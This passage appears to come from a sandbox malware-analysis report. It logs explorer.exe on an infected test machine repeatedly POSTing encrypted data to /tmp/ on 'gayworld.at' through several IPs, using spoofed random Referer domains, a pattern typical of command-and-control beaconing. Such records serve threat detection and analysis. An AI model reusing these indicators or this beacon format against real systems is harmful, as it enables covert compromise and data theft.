                  Content-Type: text/html; charset=utf-8
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  18 | 192.168.2.5 | 49713 | 123.213.233.194 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Oct 10, 2022 23:21:24.328396082 CEST | 156 | OUT | POST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://hepvmeebid.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 201
                  Host: gayworld.at
                  Oct 10, 2022 23:21:24.328737020 CEST | 156 | OUT | Data Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 3d 3c e4 f6
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vu=<+kh0bwm~YZ^J8v7-=N^CMp6d\6 EYL#
                  Oct 10, 2022 23:21:25.508678913 CEST | 157 | IN | HTTP/1.1 200 OK
                  Date: Mon, 10 Oct 2022 21:21:24 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 0
                  Connection: close
                  Content-Type: text/html; charset=utf-8


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  19 | 192.168.2.5 | 49714 | 211.171.233.129 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Oct 10, 2022 23:21:26.167962074 CEST | 158 | OUT | POST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://biqudpj.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 220
                  Host: gayworld.at
                  Oct 10, 2022 23:21:26.167962074 CEST | 158 | OUT | Data Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 49 5a dc f8
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vuIZ&^T@ `vaZ=?|J(_7.KaYKC+RZ=DzWf<0GM_(
                  Oct 10, 2022 23:21:27.166604996 CEST | 159 | IN | HTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:26 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  2 | 192.168.2.5 | 49695 | 175.120.254.9 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Oct 10, 2022 23:20:40.724772930 CEST | 104 | OUT | POST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://vqhcrffxeq.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 174
                  Host: gayworld.at
                  Oct 10, 2022 23:20:40.728177071 CEST | 104 | OUT | Data Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4e 1f ff 82
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA .[k,vuNC8SG_i<H=fRo|>(9\kE2*UF)=t,@ez
                  Oct 10, 2022 23:20:41.908329010 CEST | 105 | IN | HTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:20:41 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 8
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Raw: 04 00 00 00 72 e8 87 ea
                  Data Ascii: r


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  20 | 192.168.2.5 | 49715 | 175.120.254.9 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Oct 10, 2022 23:21:27.468192101 CEST | 160 | OUT | POST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://gjcuybim.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 168
                  Host: gayworld.at
                  Oct 10, 2022 23:21:27.468229055 CEST | 160 | OUT | Data Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 23 1b d6 ad
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vu#j8szL^~+.v>5]-lGd0f|&/IT$J>6t8
                  Oct 10, 2022 23:21:28.664248943 CEST | 160 | IN | HTTP/1.1 200 OK
                  Date: Mon, 10 Oct 2022 21:21:28 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 0
                  Connection: close
                  Content-Type: text/html; charset=utf-8


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  21 | 192.168.2.5 | 49716 | 123.213.233.194 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Oct 10, 2022 23:21:28.975450039 CEST | 161 | OUT | POST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://xyeynuw.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 307
                  Host: gayworld.at
                  Oct 10, 2022 23:21:28.975466013 CEST | 161 | OUT | Data Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 27 25 fa e8
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vu'%wc _E-d9+=$t0]!W|IQk''*y#_THfb#.(mg+59
                  Oct 10, 2022 23:21:30.171087027 CEST | 162 | IN | HTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:29 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  22 | 192.168.2.5 | 49717 | 175.120.254.9 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Oct 10, 2022 23:21:30.478796005 CEST | 163 | OUT | POST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://aaidrfo.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 317
                  Host: gayworld.at
                  Oct 10, 2022 23:21:30.478827000 CEST | 164 | OUT | Data Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 54 15 e2 f2
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vuT8EnD-QS<7V{#}hZ17 U(TP{zO0=pF:^pUdnQ-@3fsK\DV~(bR
                  Oct 10, 2022 23:21:31.674793005 CEST | 164 | IN | HTTP/1.1 200 OK
                  Date: Mon, 10 Oct 2022 21:21:31 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 0
                  Connection: close
                  Content-Type: text/html; charset=utf-8


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  23 | 192.168.2.5 | 49718 | 175.120.254.9 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Oct 10, 2022 23:21:31.972645044 CEST | 165 | OUT | POST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://dhgat.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 207
                  Host: gayworld.at
                  Oct 10, 2022 23:21:31.972681046 CEST | 165 | OUT | Data Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 28 3c d5 fa
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vu(<DIwKb[&7hQA;#}bR9!gC>n{V[(5+e6(_)-^L2C
                  Oct 10, 2022 23:21:33.152183056 CEST | 166 | IN | HTTP/1.1 200 OK
                  Date: Mon, 10 Oct 2022 21:21:32 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 0
                  Connection: close
                  Content-Type: text/html; charset=utf-8


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  24 | 192.168.2.5 | 49719 | 211.171.233.126 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Oct 10, 2022 23:21:33.465965033 CEST | 167 | OUT | POST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://tusjn.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 165
                  Host: gayworld.at
                  Oct 10, 2022 23:21:33.466011047 CEST | 167 | OUT | Data Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 7a 43 cd 88
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vuzC;oHSwh946E~XS%:0-=;V<*$*q(
                  Oct 10, 2022 23:21:34.739589930 CEST | 167 | IN | HTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:34 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  25 | 192.168.2.5 | 49720 | 109.102.255.230 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Oct 10, 2022 23:21:35.785954952 CEST | 168 | OUT | POST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://cprumtbxh.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 338
                  Host: gayworld.at
                  Oct 10, 2022 23:21:35.785999060 CEST | 169 | OUT | Data Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 6c 5f b7 f9
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vul_M^sjTwY/nYu!3]wrA(AKkGJZt`${`_(lGJ,3UTQ-B7e`oCtxm4-
                  Oct 10, 2022 23:21:36.006616116 CEST | 169 | IN | HTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:35 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  26 | 192.168.2.5 | 49721 | 123.213.233.194 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Oct 10, 2022 23:21:36.299575090 CEST | 170 | OUT | POST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://yhuni.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 219
                  Host: gayworld.at
                  Oct 10, 2022 23:21:36.299638033 CEST | 171 | OUT | Data Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 30 3e df f0
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vu0>m-lOWfh,^R:hn,R:a^XJkH(EiizEK8upq,RO(Zzu
                  Oct 10, 2022 23:21:37.198333979 CEST | 171 | IN | HTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:36 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  27 | 192.168.2.5 | 49722 | 123.213.233.194 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Oct 10, 2022 23:21:37.493453026 CEST | 172 | OUT | POST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://bexxetwrlu.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 237
                  Host: gayworld.at
                  Oct 10, 2022 23:21:37.493484974 CEST | 173 | OUT | Data Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 72 0f a3 8d
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vuruOo=$uep\bfhCOai%M|XGjs a_9V!&(#Ky1Tba#
                  Oct 10, 2022 23:21:38.672943115 CEST | 173 | IN | HTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:38 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  28 | 192.168.2.5 | 49723 | 211.171.233.129 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Oct 10, 2022 23:21:38.968161106 CEST | 174 | OUT | POST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://wrsfqkp.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 159
                  Host: gayworld.at
                  Oct 10, 2022 23:21:38.968161106 CEST | 175 | OUT | Data Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 32 54 cf 9a
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vu2Tr*ML3d-&=/j3#aVP_?'%RnDL
                  Oct 10, 2022 23:21:39.942960024 CEST | 175 | IN | HTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:39 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  29 | 192.168.2.5 | 49724 | 195.158.3.162 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Oct 10, 2022 23:21:40.109589100 CEST | 176 | OUT | POST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://vorjorv.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 196
                  Host: gayworld.at
                  Oct 10, 2022 23:21:40.109636068 CEST | 177 | OUT | Data Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 3d 4c e4 9e
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vu=LE'z-cnqxUh150tM;/K~"6QQ"$]rYaxM
                  Oct 10, 2022 23:21:40.615967035 CEST | 177 | IN | HTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:40 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  3 | 192.168.2.5 | 49696 | 123.213.233.194 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Oct 10, 2022 23:20:42.553354025 CEST | 106 | OUT | POST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://bflbsmk.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 253
                  Host: gayworld.at
                  Oct 10, 2022 23:20:42.553417921 CEST | 106 | OUT | Data Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 2c 5e a6 9d
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vu,^/UYZI'Opow\@]MJu&#2rC^>q`%[/Vu}e19,"DX-)hWdFs+
                  Oct 10, 2022 23:20:43.730217934 CEST | 107 | IN | HTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:20:43 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  30 | 192.168.2.5 | 49725 | 175.120.254.9 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Oct 10, 2022 23:21:40.937239885 CEST | 178 | OUT | POST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://vyenmgvrby.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 158
                  Host: gayworld.at
                  Oct 10, 2022 23:21:40.937269926 CEST | 179 | OUT | Data Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 58 5f d0 a4
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vuX_vLBt,rtC1Eb)HE2<+tvR
                  Oct 10, 2022 23:21:41.830338001 CEST | 179 | IN | HTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:41 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  31 | 192.168.2.5 | 49726 | 123.213.233.194 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Oct 10, 2022 23:21:42.125679016 CEST | 180 | OUT | POST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://exqejm.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 369
                  Host: gayworld.at
                  Oct 10, 2022 23:21:42.125813007 CEST | 181 | OUT | Data Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 16 6b 2c 90 f5 76 0b 75 3e 3b c0 8b
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vu>;]=DXiqsGER.wq0fu0l&UDDn9HC<Tr~6N4G!1qNCwI/nk_Rl90 #
                  Oct 10, 2022 23:21:43.298779011 CEST | 181 | IN | HTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:42 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
